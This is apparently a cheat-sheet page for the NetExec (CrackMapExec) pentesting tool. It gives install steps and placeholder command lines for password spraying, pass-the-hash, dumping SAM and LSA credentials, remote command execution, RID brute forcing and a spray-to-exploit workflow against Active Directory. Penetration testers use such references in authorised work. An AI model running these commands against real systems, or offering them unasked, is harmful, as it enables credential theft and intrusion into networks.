Description
CrackMapExec (now NetExec) is the Swiss army knife for Active Directory and Windows pentesting. It supports SMB, WinRM, LDAP, MSSQL, SSH, and RDP protocols with credential spraying, enumeration, and post-exploitation capabilities.
Installation
BASH
# NetExec (successor to CrackMapExec)
pip install netexec
# Or
pipx install git+https://github.com/Pennyw0rth/NetExecBasic Usage
BASH
# SMB enumeration
nxc smb <IP> -u user -p 'password'
nxc smb <IP/CIDR> -u '' -p '' --shares
# Password spraying
nxc smb <IP/CIDR> -u users.txt -p 'Password1!'
nxc smb <IP/CIDR> -u users.txt -p passwords.txt --no-bruteforce
# WinRM
nxc winrm <IP> -u user -p 'password' -x 'whoami'
# LDAP
nxc ldap <DC_IP> -u user -p 'password' --usersAdvanced Usage
BASH
# Pass-the-Hash
nxc smb <IP> -u admin -H 'NTLM_HASH' --sam
# Dump SAM/LSA
nxc smb <IP> -u admin -p 'password' --sam
nxc smb <IP> -u admin -p 'password' --lsa
# Find relay targets
nxc smb <IP/CIDR> --gen-relay-list relay.txt
# Command execution
nxc smb <IP> -u admin -p 'password' -x 'whoami'
nxc smb <IP> -u admin -p 'password' -X 'Get-Process' # PowerShell
# RID brute force
nxc smb <IP> -u '' -p '' --rid-brute
# Bloodhound collection
nxc ldap <DC_IP> -u user -p 'password' --bloodhound -c AllCommon Workflows
BASH
# AD spray + enumerate + exploit
nxc smb <DC_IP> -u users.txt -p 'Spring2025!' --continue-on-success
nxc smb <DC_IP> -u valid_user -p 'Spring2025!' --shares
nxc smb <DC_IP> -u valid_user -p 'Spring2025!' --sam